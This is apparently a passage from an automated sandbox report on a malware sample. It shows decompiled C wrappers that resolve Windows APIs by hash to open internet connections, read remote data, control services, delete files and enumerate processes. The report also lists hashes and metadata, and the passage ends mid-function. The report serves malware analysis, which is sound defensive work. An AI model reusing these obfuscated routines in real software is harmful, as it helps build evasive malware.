SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00227C67

Memory Dump Source

Source File: 0000000C.00000002.2109419000.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000C.00000002.2109412427.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2109471983.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: 4506c20672cf2cf3caec14a6ca0a9d6c1bf7f964dc28c20fa5fa43f13956cead
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: 7E014FB190120CFFEB09DF94D84A8DEBBB5EF44314F108198F40567240E7B15F609B91

Uniqueness

Uniqueness Score: -1.00%

Function 0021F65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0021F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002207A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0021F6D8

Memory Dump Source

Source File: 0000000C.00000002.2109419000.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000C.00000002.2109412427.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2109471983.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: 106e2d8713a64ed87b02e2ca2f7615aa113f59112c714e2c671415f888782640
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: 9B01E5B6901208BBEF059F94DC4A8DF7F75EB05324F148188F90462250D6B25E61DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0021B6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0021B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0021602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002207A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x0021b6f3
0x0021b6f8
0x0021b702
0x0021b70b
0x0021b712
0x0021b719
0x0021b720
0x0021b727
0x0021b72e
0x0021b747
0x0021b759
0x0021b75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0021B759

Memory Dump Source

Source File: 0000000C.00000002.2109419000.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000C.00000002.2109412427.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2109471983.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: 82f69c0fac6d70267d21593f0c3ff8349d879125f3defbce7c14a7de5816fdb4
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: 150178B2940308FBEB45DF90DD06A9E7BB5EB18704F108188FA09261A0D3B25A20AB61

Uniqueness

Uniqueness Score: -1.00%

Function 0022AA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0022AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002207A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x0022aa3f
0x0022aa40
0x0022aa41
0x0022aa44
0x0022aa47
0x0022aa4b
0x0022aa4c
0x0022aa51
0x0022aa5b
0x0022aa64
0x0022aa68
0x0022aa6f
0x0022aa76
0x0022aa8d
0x0022aa90
0x0022aa9d
0x0022aaa8
0x0022aaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0022AAA8

Memory Dump Source

Source File: 0000000C.00000002.2109419000.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000C.00000002.2109412427.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2109471983.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: bda999c00b52578895d364b87efee0fbb129f381efd7f11970989b5c23b94233
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 92F069B191020CFFDF08DF94DD4A89EBFB4EB44304F108088F805A6250D3B69B649B50

Uniqueness

Uniqueness Score: -1.00%

Function 00215FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00215FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002207A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x00215fb5
0x00215fb6
0x00215fb7
0x00215fbb
0x00215fbc
0x00215fc1
0x00215fcb
0x00215fd7
0x00215fde
0x00215fe5
0x00215ffc
0x00215fff
0x00216006
0x0021600d
0x0021601a
0x00216025
0x0021602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 00216025

Memory Dump Source

Source File: 0000000C.00000002.2109419000.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000C.00000002.2109412427.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2109471983.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: 5d995ea7630725837acdc99d8627ad3ff9cdb75dcbb2e3a096d8fe34c137cd10
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: C9F04FB0C11208FFDB08DFA0E94689EBFB8EB40300F20819CE409A7260E7715F559F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2496 Parent PID: 2456 rundll32.exeCOMMON

Executed Functions

Function 0020023A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0020023A(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, intOrPtr _a12, long _a16, DWORD* _a20) {
				signed int _v8;
				signed int _v12;
				void* _t25;
				int _t31;
				void* _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t37 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001F602B(_t25);
				_v12 = 0x4c1d;
				_v12 = _v12 ^ 0x5ad90362;
				_v12 = _v12 ^ 0x5ad955af;
				_v8 = 0xc5f7;
				_v8 = _v8 * 0x75;
				_v8 = _v8 ^ 0x98520be0;
				_v8 = _v8 + 0xd998;
				_v8 = _v8 ^ 0x98094817;
				E002007A9(0xb92c1268, 0x1f801b8, __ecx, __ecx, 0x1c9);
				_t31 = InternetReadFile(_t37, _a8, _a16, _a20); // executed
				return _t31;
			}

0x0020023d
0x0020023e
0x00200240
0x00200243
0x00200245
0x00200248
0x0020024b
0x0020024e
0x00200252
0x00200253
0x00200258
0x00200262
0x0020026e
0x00200275
0x0020028c
0x0020028f
0x00200296
0x0020029d
0x002002aa
0x002002bc
0x002002c2

APIs

InternetReadFile.WININET(00000000,2CD2473D,0003F015,FFEAC835), ref: 002002BC

Strings

ws Media Center the remote control commands..How do you want to configure your set-top box?Local Library.Searching for shared lib, xrefs: 00200269

Memory Dump Source

Source File: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000D.00000002.2339856494.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2339879613.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileInternetRead
String ID: ws Media Center the remote control commands..How do you want to configure your set-top box?Local Library.Searching for shared lib
API String ID: 778332206-4005334235
Opcode ID: 5aea17a31f83cfee10962f094a32e89ed49328cc982311645bc2611183f53528
Instruction ID: 47ccb49e4908869da2e0d2de8ae860ea008fa2a4a74a2df1564e823dd96c72d0
Opcode Fuzzy Hash: 5aea17a31f83cfee10962f094a32e89ed49328cc982311645bc2611183f53528
Instruction Fuzzy Hash: AB012975901208FFEF05EF94D9068DEBFB9EF45314F108188F90466261D7729F61AB90

Uniqueness

Uniqueness Score: -1.00%

Function 001F75AE, Relevance: 1.6, APIs: 1, Instructions: 62
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E001F75AE(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44) {
				signed int _v8;
				signed int _v12;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t54;
				signed int _t55;
				void* _t63;
				void* _t64;

				_t64 = __edx;
				E001F602B(_t43);
				_v8 = 0x98b5;
				_v8 = _v8 >> 9;
				_t54 = 0x5f;
				_v8 = _v8 / _t54;
				_v8 = _v8 + 0xffff1c63;
				_v8 = _v8 ^ 0xffff635b;
				_v12 = 0x5016;
				_v12 = _v12 + 0xffff6b9b;
				_t55 = 0x41;
				_v12 = _v12 / _t55;
				_v12 = _v12 ^ 0x03f03403;
				_t51 = E002007A9(0x93576eb5, 0x12e6675d, _t55, _t55, 0x110);
				_t52 =  *_t51(_a36, _a12, _t64, _a20, _a32, 0, _a8, _a24, __ecx, __edx, 0, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _t63, __ecx, __ecx); // executed
				return _t52;
			}

0x001f75b7
0x001f75d8
0x001f75dd
0x001f75e7
0x001f75f2
0x001f75f7
0x001f75fc
0x001f7603
0x001f760a
0x001f7611
0x001f761b
0x001f7623
0x001f762b
0x001f763f
0x001f765c
0x001f7662

APIs

CryptDecodeObjectEx.CRYPT32(00001A16,3FEE891D,00000000,FFFF309F,FEFFE01A,00000000,?,01C46047), ref: 001F765C

Memory Dump Source

Source File: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000D.00000002.2339856494.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2339879613.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CryptDecodeObject
String ID:
API String ID: 1207547050-0
Opcode ID: 48f2b61483b0afb25e5a152f65d42c1f563eb6edafd256c2ccbd9b0086fc00f6
Instruction ID: 380615c3054bb0c6962c50ce5e32716f07395960284f87b17ed079dda78588bb
Opcode Fuzzy Hash: 48f2b61483b0afb25e5a152f65d42c1f563eb6edafd256c2ccbd9b0086fc00f6
Instruction Fuzzy Hash: E921087290060CFFDF05CF94DC46DDE7F76EB49314F148148FA18661A0D7B29A61AB90

Uniqueness

Uniqueness Score: -1.00%

Function 001F109C, Relevance: 1.5, APIs: 1, Instructions: 46
fileCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E001F109C(void* __ecx, WCHAR* __edx, struct _WIN32_FIND_DATAW* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t30;
				void* _t38;
				signed int _t40;
				WCHAR* _t46;

				_push(_a16);
				_t46 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E001F602B(_t30);
				_v16 = _v16 & 0x00000000;
				_v24 = 0xf19a8;
				_v20 = 0x58c643;
				_v12 = 0xbcc6;
				_v12 = _v12 | 0xbb59ffff;
				_v12 = _v12 ^ 0xbb59839d;
				_v8 = 0x5dbd;
				_v8 = _v8 << 0xd;
				_t40 = 0x3f;
				_v8 = _v8 / _t40;
				_v8 = _v8 * 0x1f;
				_v8 = _v8 ^ 0x05c44d1b;
				E002007A9(0xce5de7ff, 0x9164b7cc, _t40, _t40, 0x264);
				_t38 = FindFirstFileW(_t46, _a4); // executed
				return _t38;
			}

0x001f10a3
0x001f10a6
0x001f10a8
0x001f10ab
0x001f10ae
0x001f10b1
0x001f10b3
0x001f10b8
0x001f10bf
0x001f10c8
0x001f10cf
0x001f10d6
0x001f10dd
0x001f10e4
0x001f10eb
0x001f10f4
0x001f10fc
0x001f110f
0x001f1112
0x001f111f
0x001f112b
0x001f1131

APIs

FindFirstFileW.KERNEL32(?,BB59839D), ref: 001F112B

Memory Dump Source

Source File: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000D.00000002.2339856494.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2339879613.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 0fd23be9f3eba847a5a9bdd4d091bd485d62c5ec83e6e683a4ca1e9cfb5b8d80
Instruction ID: 486c3648ef76de9c11670fb3f00569a5e98de9a17a6242f580f2df79a77b5909
Opcode Fuzzy Hash: 0fd23be9f3eba847a5a9bdd4d091bd485d62c5ec83e6e683a4ca1e9cfb5b8d80
Instruction Fuzzy Hash: DF1157B5D01208FBEF04EFA8D94A9DEBFB5EF45314F208098E9086B251D7B54B249B91

Uniqueness

Uniqueness Score: -1.00%

Function 001F1C88, Relevance: 1.5, APIs: 1, Instructions: 38
processCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E001F1C88(int _a12) {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				void* _t28;
				signed int _t29;

				_v28 = 0x4309a9;
				asm("stosd");
				_t29 = 0x31;
				asm("stosd");
				asm("stosd");
				_v12 = 0x7af7;
				_v12 = _v12 + 0x2003;
				_v12 = _v12 ^ 0x000083a5;
				_v8 = 0xa138;
				_v8 = _v8 << 8;
				_v8 = _v8 / _t29;
				_v8 = _v8 ^ 0x00030e85;
				E002007A9(0xf2bcf6a3, 0x9164b7cc, _t29, _t29, 0x45);
				_t28 = CreateToolhelp32Snapshot(_a12, 0); // executed
				return _t28;
			}

0x001f1c8f
0x001f1c9d
0x001f1ca0
0x001f1ca3
0x001f1ca6
0x001f1ca7
0x001f1cae
0x001f1cb5
0x001f1cbc
0x001f1cc3
0x001f1cd6
0x001f1cd9
0x001f1ce6
0x001f1cf3
0x001f1cf9

APIs

CreateToolhelp32Snapshot.KERNEL32(?,00000000), ref: 001F1CF3

Memory Dump Source

Source File: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000D.00000002.2339856494.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2339879613.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateSnapshotToolhelp32
String ID:
API String ID: 3332741929-0
Opcode ID: ea0f0127b5065ca251a00853203831dc196477c93da7ac2d986631f05f845638
Instruction ID: 5e7601cdc3b89fb105ee3e3ba5069fa5a7c31722d96e868468f29d3edd6fb6cc
Opcode Fuzzy Hash: ea0f0127b5065ca251a00853203831dc196477c93da7ac2d986631f05f845638
Instruction Fuzzy Hash: 15F03171E11208BBFB04DFA8CD4669EFBB5EF94704F208099E50067291D7F55F158B91

Uniqueness

Uniqueness Score: -1.00%

Function 001F5A52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
networkCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E001F5A52(WCHAR* __ecx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24) {
				unsigned int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				void* _t25;
				void* _t31;
				WCHAR* _t37;

				_t37 = __ecx;
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(0);
				_push(__ecx);
				E001F602B(_t25);
				_v28 = 0x354aea;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v8 = 0x4733;
				_v8 = _v8 << 0xb;
				_v8 = _v8 + 0xffffa4b2;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x00006f5b;
				_v12 = 0x6e5;
				_v12 = _v12 ^ 0x21b9cf62;
				_v12 = _v12 ^ 0x21b9d5f6;
				E002007A9(0xfc7e7fb7, 0x1f801b8, __ecx, __ecx, 0x1ad);
				_t31 = InternetOpenW(_t37, _a24, 0, 0, 0); // executed
				return _t31;
			}

0x001f5a5d
0x001f5a5f
0x001f5a60
0x001f5a63
0x001f5a66
0x001f5a69
0x001f5a6c
0x001f5a6f
0x001f5a70
0x001f5a71
0x001f5a72
0x001f5a77
0x001f5a86
0x001f5a91
0x001f5a99
0x001f5a9a
0x001f5aa1
0x001f5aa5
0x001f5aac
0x001f5ab0
0x001f5ab7
0x001f5abe
0x001f5ac5
0x001f5ad2
0x001f5ae1
0x001f5ae9

APIs

InternetOpenW.WININET(00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0CD25E5E), ref: 001F5AE1

Strings

J5, xrefs: 001F5A77
ws Media Center the remote control commands..How do you want to configure your set-top box?Local Library.Searching for shared lib, xrefs: 001F5A87

Memory Dump Source

Source File: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000D.00000002.2339856494.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2339879613.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: InternetOpen
String ID: ws Media Center the remote control commands..How do you want to configure your set-top box?Local Library.Searching for shared lib$J5
API String ID: 2038078732-2885573465
Opcode ID: 7c15cf55018e347f4ace21a93f9c9c926ac753e269a0466785618c49b19088fb
Instruction ID: 3d41a98737e6fb66045a16facc10aabe53ef8022b70c196be2582c05afb3306a
Opcode Fuzzy Hash: 7c15cf55018e347f4ace21a93f9c9c926ac753e269a0466785618c49b19088fb
Instruction Fuzzy Hash: 59115E7290060CBFEB05DF98DD859DFBB79EF54358F104098FA0562120D3B64F659BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00207955, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62
networkCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E00207955(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, WCHAR* _a36, void* _a44, intOrPtr _a52) {
				signed int _v8;
				signed int _v12;
				WCHAR* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t41;
				short _t47;

				_push(_a52);
				_t47 = __ecx;
				_push(0);
				_push(_a44);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(__ecx & 0x0000ffff);
				E001F602B(__ecx & 0x0000ffff);
				_v24 = 0x1f9770;
				_v20 = 0x380697;
				_v16 = 0;
				_v12 = 0x6440;
				_v12 = _v12 * 0xf;
				_v12 = _v12 * 0x65;
				_v12 = _v12 ^ 0x02513e1b;
				_v8 = 0x9d26;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0x42bae3e2;
				_v8 = _v8 + 0x19dc;
				_v8 = _v8 ^ 0x40ce99cc;
				E002007A9(0x73a58955, 0x1f801b8, __ecx, __ecx, 0x1fa);
				_t41 = InternetConnectW(_a44, _a36, _t47, 0, 0, _a32, 0, 0); // executed
				return _t41;
			}

0x0020795d
0x00207962
0x00207964
0x00207965
0x0020796b
0x0020796c
0x0020796f
0x00207972
0x00207975
0x00207978
0x00207979
0x0020797c
0x0020797f
0x00207980
0x00207984
0x00207985
0x0020798a
0x00207994
0x002079a0
0x002079a3
0x002079ba
0x002079c1
0x002079c4
0x002079cb
0x002079d2
0x002079d6
0x002079dd
0x002079e4
0x002079f1
0x00207a07
0x00207a0e

APIs

InternetConnectW.WININET(?,?,?,00000000,00000000,?,00000000,00000000), ref: 00207A07

Strings

ws Media Center the remote control commands..How do you want to configure your set-top box?Local Library.Searching for shared lib, xrefs: 0020799B

Memory Dump Source

Source File: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000D.00000002.2339856494.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2339879613.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ConnectInternet
String ID: ws Media Center the remote control commands..How do you want to configure your set-top box?Local Library.Searching for shared lib
API String ID: 3050416762-4005334235
Opcode ID: a5cc7dfa8e1f578d9882cc34f057ad90facde6536c1dd8886fbecc1955af6ef0
Instruction ID: 4ab1824d77010f276db0bd1ded05f86e43e00c83293fda1385a84920885bb59c
Opcode Fuzzy Hash: a5cc7dfa8e1f578d9882cc34f057ad90facde6536c1dd8886fbecc1955af6ef0
Instruction Fuzzy Hash: 47212472800248BBCF119F92CD49CDFBFB9FF89718F108199F90566120D7719A60DB60

Uniqueness

Uniqueness Score: -1.00%

Function 001F2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E001F2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E001F602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002007A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 001F29DC

Strings

<^, xrefs: 001F2977

Memory Dump Source

Source File: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000D.00000002.2339856494.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2339879613.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: c55c8693578de0a15b64fe4e162e7219b95c9f74affb71a64b93f36a3bebe02f
Instruction ID: 22c181d947d5c3b9079b2eb04d44297966d1c9b7dd736f612a36f4591dae9978
Opcode Fuzzy Hash: c55c8693578de0a15b64fe4e162e7219b95c9f74affb71a64b93f36a3bebe02f
Instruction Fuzzy Hash: 1B018072A00208BFEB14DF95DC4A8DFBFB6EF45310F108088F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 001FC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001FC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E001F602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002007A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x001fc6e1
0x001fc6e6
0x001fc6f0
0x001fc6fc
0x001fc703
0x001fc706
0x001fc70d
0x001fc711
0x001fc715
0x001fc71c
0x001fc723
0x001fc72a
0x001fc731
0x001fc738
0x001fc751
0x001fc762
0x001fc768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 001FC762

Strings

/O, xrefs: 001FC6E6

Memory Dump Source

Source File: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000D.00000002.2339856494.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2339879613.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 30da3a07f34f73dd2d7e05b570dca88aea51d71bd043760bee17983db85881fe
Instruction ID: 79b4102c1dea873a57f12ff49eb32eefa7696dc2b46041cafa4feff527189ffe
Opcode Fuzzy Hash: 30da3a07f34f73dd2d7e05b570dca88aea51d71bd043760bee17983db85881fe
Instruction Fuzzy Hash: 131133B290122DBBCB25DF95DC498EFBFB8EF05714F108188F90962220D7714B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00208422, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
networkCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00208422(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8, void* _a12, long _a16, intOrPtr _a24, void* _a28) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t33;
				int _t40;

				_push(_a28);
				_push(_a24);
				_push(0xffffffff);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001F602B(_t33);
				_v20 = _v20 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v28 = 0x2f14d8;
				_v24 = 0x27cc4d;
				_v8 = 0xcfda;
				_v8 = _v8 << 7;
				_v8 = _v8 * 0x1b;
				_v8 = _v8 ^ 0xd01d7588;
				_v8 = _v8 ^ 0xdae8f2b7;
